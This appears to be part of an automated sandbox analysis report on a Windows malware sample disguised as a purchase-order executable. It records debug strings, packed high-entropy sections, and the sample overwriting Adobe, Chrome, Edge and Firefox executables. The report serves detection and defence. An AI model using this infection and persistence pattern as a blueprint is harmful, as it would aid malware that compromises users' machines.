Source:	Binary string: private_browsing.pdb source: alg.exe, 00000003.00000003.2954259181.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: alg.exe, 00000003.00000003.2248053012.00000000014C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000003.00000003.2635972950.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2627279177.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2625776656.00000000014C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000003.00000003.2361122927.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000003.00000003.2471181991.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000003.00000003.2225655829.00000000014D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: alg.exe, 00000003.00000003.2700657166.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2696751735.0000000000490000.00000004.00001000.00020000.00000000.sdmp, MavInject32.exe.3.dr
Source:	Binary string: maintenanceservice.pdb source: alg.exe, 00000003.00000003.2881829514.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.2546360470.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000003.00000003.2670954388.0000000000490000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: alg.exe, 00000003.00000003.2874633296.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000003.00000003.2530364880.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: alg.exe, 00000003.00000003.2874633296.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000003.00000003.2443691533.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\setup.exe.pdb source: setup.exe1.3.dr
Source:	Binary string: private_browsing.pdbp source: alg.exe, 00000003.00000003.2954259181.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000003.00000003.2571726187.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000003.00000003.2471181991.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000003.00000003.2535143578.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000003.00000003.2566964234.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: alg.exe, 00000003.00000003.2881829514.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000003.00000003.2583011875.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2590018724.0000000001430000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Grinnellia.exe, 00000008.00000003.2095158890.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000008.00000003.2093103078.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000003.2113799471.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000003.2123309552.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000003.2239183248.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000003.2231355284.0000000004990000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000003.00000003.2488059253.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2060386769.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OSPPREARM.EXE.3.dr
Source:	Binary string: ALG.pdbGCTL source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2060386769.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000003.00000003.2269957277.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: updater.pdb source: alg.exe, 00000003.00000003.2980929452.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: alg.exe, 00000003.00000003.2665025413.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.2535143578.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000003.00000003.2488059253.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000003.00000003.2665025413.0000000000400000.00000004.00001000.00020000.00000000.sdmp

Source: alg.exe.0.dr

Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_0041E01E LoadLibraryA,GetProcAddress,

0_2_0041E01E

Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr

Static PE information: real checksum: 0x1fb4b should be: 0x137475

Source: armsvc.exe.0.dr	Static PE information: section name: .didat
Source: alg.exe.0.dr	Static PE information: section name: .didat
Source: minidump-analyzer.exe.3.dr	Static PE information: section name: .00cfg
Source: minidump-analyzer.exe.3.dr	Static PE information: section name: .voltbl
Source: pingsender.exe.3.dr	Static PE information: section name: .00cfg
Source: pingsender.exe.3.dr	Static PE information: section name: .voltbl
Source: GoogleCrashHandler64.exe.3.dr	Static PE information: section name: _RDATA
Source: GoogleCrashHandler64.exe.3.dr	Static PE information: section name: .gxfg
Source: GoogleCrashHandler64.exe.3.dr	Static PE information: section name: .gehcont
Source: GoogleUpdateComRegisterShell64.exe.3.dr	Static PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.3.dr	Static PE information: section name: .gxfg
Source: GoogleUpdateComRegisterShell64.exe.3.dr	Static PE information: section name: .gehcont
Source: 117.0.5938.132_chrome_installer.exe.3.dr	Static PE information: section name: .00cfg
Source: 117.0.5938.132_chrome_installer.exe.3.dr	Static PE information: section name: .retplne
Source: plugin-container.exe.3.dr	Static PE information: section name: .00cfg
Source: plugin-container.exe.3.dr	Static PE information: section name: .voltbl
Source: private_browsing.exe.3.dr	Static PE information: section name: .00cfg
Source: private_browsing.exe.3.dr	Static PE information: section name: .voltbl
Source: updater.exe.3.dr	Static PE information: section name: .00cfg
Source: updater.exe.3.dr	Static PE information: section name: .voltbl
Source: updater.exe.3.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.3.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe.3.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe.3.dr	Static PE information: section name: .retplne
Source: elevation_service.exe.3.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.3.dr	Static PE information: section name: malloc_h
Source: maintenanceservice.exe.3.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe.3.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe.3.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe0.3.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe0.3.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe0.3.dr	Static PE information: section name: .retplne
Source: elevation_service.exe0.3.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe0.3.dr	Static PE information: section name: malloc_h
Source: unpack200.exe.3.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.3.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.3.dr	Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.3.dr	Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.3.dr	Static PE information: section name: _RDATA
Source: cookie_exporter.exe.3.dr	Static PE information: section name: .00cfg
Source: cookie_exporter.exe.3.dr	Static PE information: section name: .gxfg
Source: cookie_exporter.exe.3.dr	Static PE information: section name: .retplne
Source: cookie_exporter.exe.3.dr	Static PE information: section name: _RDATA
Source: Acrobat.exe.3.dr	Static PE information: section name: .didat
Source: Acrobat.exe.3.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.3.dr	Static PE information: section name: .00cfg
Source: identity_helper.exe.3.dr	Static PE information: section name: .gxfg
Source: identity_helper.exe.3.dr	Static PE information: section name: .retplne
Source: identity_helper.exe.3.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.3.dr	Static PE information: section name: malloc_h
Source: setup.exe.3.dr	Static PE information: section name: .00cfg
Source: setup.exe.3.dr	Static PE information: section name: .gxfg
Source: setup.exe.3.dr	Static PE information: section name: .retplne
Source: setup.exe.3.dr	Static PE information: section name: LZMADEC
Source: setup.exe.3.dr	Static PE information: section name: _RDATA
Source: setup.exe.3.dr	Static PE information: section name: malloc_h
Source: msedgewebview2.exe.3.dr	Static PE information: section name: .00cfg
Source: msedgewebview2.exe.3.dr	Static PE information: section name: .gxfg
Source: msedgewebview2.exe.3.dr	Static PE information: section name: .retplne
Source: msedgewebview2.exe.3.dr	Static PE information: section name: CPADinfo
Source: msedgewebview2.exe.3.dr	Static PE information: section name: LZMADEC
Source: msedgewebview2.exe.3.dr	Static PE information: section name: _RDATA
Source: msedgewebview2.exe.3.dr	Static PE information: section name: malloc_h
Source: msedge_proxy.exe.3.dr	Static PE information: section name: .00cfg
Source: msedge_proxy.exe.3.dr	Static PE information: section name: .gxfg
Source: msedge_proxy.exe.3.dr	Static PE information: section name: .retplne
Source: msedge_proxy.exe.3.dr	Static PE information: section name: _RDATA
Source: msedge_proxy.exe.3.dr	Static PE information: section name: malloc_h
Source: msedge_pwa_launcher.exe.3.dr	Static PE information: section name: .00cfg
Source: msedge_pwa_launcher.exe.3.dr	Static PE information: section name: .gxfg
Source: msedge_pwa_launcher.exe.3.dr	Static PE information: section name: .retplne
Source: msedge_pwa_launcher.exe.3.dr	Static PE information: section name: LZMADEC
Source: msedge_pwa_launcher.exe.3.dr	Static PE information: section name: _RDATA
Source: msedge_pwa_launcher.exe.3.dr	Static PE information: section name: malloc_h
Source: notification_click_helper.exe.3.dr	Static PE information: section name: .00cfg
Source: notification_click_helper.exe.3.dr	Static PE information: section name: .gxfg
Source: notification_click_helper.exe.3.dr	Static PE information: section name: .retplne
Source: notification_click_helper.exe.3.dr	Static PE information: section name: CPADinfo
Source: notification_click_helper.exe.3.dr	Static PE information: section name: _RDATA
Source: notification_click_helper.exe.3.dr	Static PE information: section name: malloc_h
Source: pwahelper.exe.3.dr	Static PE information: section name: .00cfg
Source: pwahelper.exe.3.dr	Static PE information: section name: .gxfg
Source: pwahelper.exe.3.dr	Static PE information: section name: .retplne
Source: pwahelper.exe.3.dr	Static PE information: section name: _RDATA
Source: pwahelper.exe.3.dr	Static PE information: section name: malloc_h
Source: msedge_proxy.exe0.3.dr	Static PE information: section name: .00cfg
Source: msedge_proxy.exe0.3.dr	Static PE information: section name: .gxfg
Source: msedge_proxy.exe0.3.dr	Static PE information: section name: .retplne
Source: msedge_proxy.exe0.3.dr	Static PE information: section name: _RDATA
Source: msedge_proxy.exe0.3.dr	Static PE information: section name: malloc_h
Source: pwahelper.exe0.3.dr	Static PE information: section name: .00cfg
Source: pwahelper.exe0.3.dr	Static PE information: section name: .gxfg
Source: pwahelper.exe0.3.dr	Static PE information: section name: .retplne
Source: pwahelper.exe0.3.dr	Static PE information: section name: _RDATA
Source: pwahelper.exe0.3.dr	Static PE information: section name: malloc_h
Source: MicrosoftEdgeUpdate.exe.3.dr	Static PE information: section name: .didat
Source: AcroCEF.exe.3.dr	Static PE information: section name: .didat
Source: AcroCEF.exe.3.dr	Static PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe.3.dr	Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe.3.dr	Static PE information: section name: _RDATA
Source: AcroCEF.exe0.3.dr	Static PE information: section name: .didat
Source: AcroCEF.exe0.3.dr	Static PE information: section name: _RDATA
Source: MicrosoftEdgeUpdateBroker.exe.3.dr	Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.dr	Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.dr	Static PE information: section name: _RDATA
Source: MicrosoftEdgeUpdateCore.exe.3.dr	Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateOnDemand.exe.3.dr	Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateSetup.exe.3.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00426B05 push ecx; ret	0_2_00426B18
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00ABB180 push 00ABB0CAh; ret	0_2_00ABB061
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00ABB180 push 00ABB30Dh; ret	0_2_00ABB1E6
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00ABB180 push 00ABB2F2h; ret	0_2_00ABB262
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00ABB180 push 00ABB255h; ret	0_2_00ABB2ED
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00ABB180 push 00ABB2D0h; ret	0_2_00ABB346
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00ABB180 push 00ABB37Fh; ret	0_2_00ABB3B7
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AB520C push 00AB528Fh; ret	0_2_00AB522D
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD852Eh; ret	0_2_00AD7F3A
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD8514h; ret	0_2_00AD7F66
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD7E66h; ret	0_2_00AD8057
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD817Ah; ret	0_2_00AD808B
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD82E5h; ret	0_2_00AD80D9
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD826Ah; ret	0_2_00AD819E
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD849Ch; ret	0_2_00AD81E4
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD8321h; ret	0_2_00AD82E0
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD7FBFh; ret	0_2_00AD831F
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD7FA8h; ret	0_2_00AD834C
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD84BAh; ret	0_2_00AD83E2
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD8426h; ret	0_2_00AD84D8
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD8075h; ret	0_2_00AD84FD
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD808Ch; ret	0_2_00AD8512
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD8B6Fh; ret	0_2_00AD8596
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD8E94h; ret	0_2_00AD85C9
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD878Bh; ret	0_2_00AD8734
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD8D45h; ret	0_2_00AD87D3
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD8E5Fh; ret	0_2_00AD885F
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD8AB5h; ret	0_2_00AD8B13
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD8784h; ret	0_2_00AD8CA1
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD8DC9h; ret	0_2_00AD8E1C
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AD8550 push 00AD8D14h; ret	0_2_00AD8E2E

Source: PO #09465610_GQ 003745_SO-242000846.exe	Static PE information: section name: .reloc entropy: 7.8713996381848785
Source: AppVClient.exe.0.dr	Static PE information: section name: .reloc entropy: 7.936521847575095
Source: Grinnellia.exe.0.dr	Static PE information: section name: .reloc entropy: 7.8713996381848785
Source: minidump-analyzer.exe.3.dr	Static PE information: section name: .reloc entropy: 7.935473186122002
Source: 117.0.5938.132_chrome_installer.exe.3.dr	Static PE information: section name: .reloc entropy: 7.934764077756241
Source: Aut2exe.exe.3.dr	Static PE information: section name: .rsrc entropy: 7.800630228514814
Source: Aut2exe_x64.exe.3.dr	Static PE information: section name: .rsrc entropy: 7.800485415839352
Source: elevation_service.exe.3.dr	Static PE information: section name: .reloc entropy: 7.945957132980833
Source: 7zFM.exe.3.dr	Static PE information: section name: .reloc entropy: 7.932144539514835
Source: elevation_service.exe0.3.dr	Static PE information: section name: .reloc entropy: 7.94394079844746
Source: 7zG.exe.3.dr	Static PE information: section name: .reloc entropy: 7.92768722569969
Source: Acrobat.exe.3.dr	Static PE information: section name: .reloc entropy: 7.9405416003013976
Source: identity_helper.exe.3.dr	Static PE information: section name: .reloc entropy: 7.940753133148947
Source: setup.exe.3.dr	Static PE information: section name: .reloc entropy: 7.944746266729019
Source: msedgewebview2.exe.3.dr	Static PE information: section name: .reloc entropy: 7.936577170542054
Source: msedge_proxy.exe.3.dr	Static PE information: section name: .reloc entropy: 7.942270218006708
Source: msedge_pwa_launcher.exe.3.dr	Static PE information: section name: .reloc entropy: 7.946272485769608
Source: notification_click_helper.exe.3.dr	Static PE information: section name: .reloc entropy: 7.944015784480738
Source: pwahelper.exe.3.dr	Static PE information: section name: .reloc entropy: 7.940894860459117
Source: msedge_proxy.exe0.3.dr	Static PE information: section name: .reloc entropy: 7.942273376247071
Source: pwahelper.exe0.3.dr	Static PE information: section name: .reloc entropy: 7.940905655743149
Source: AcroCEF.exe.3.dr	Static PE information: section name: .reloc entropy: 7.937567567492111
Source: SingleClientServicesUpdater.exe.3.dr	Static PE information: section name: .reloc entropy: 7.943702405275626
Source: AcroCEF.exe0.3.dr	Static PE information: section name: .reloc entropy: 7.937572202101801
Source: MicrosoftEdgeUpdateSetup.exe.3.dr	Static PE information: section name: .reloc entropy: 7.939190867020072

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\90fdfad63d8f4c72.bin

Jump to behavior

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
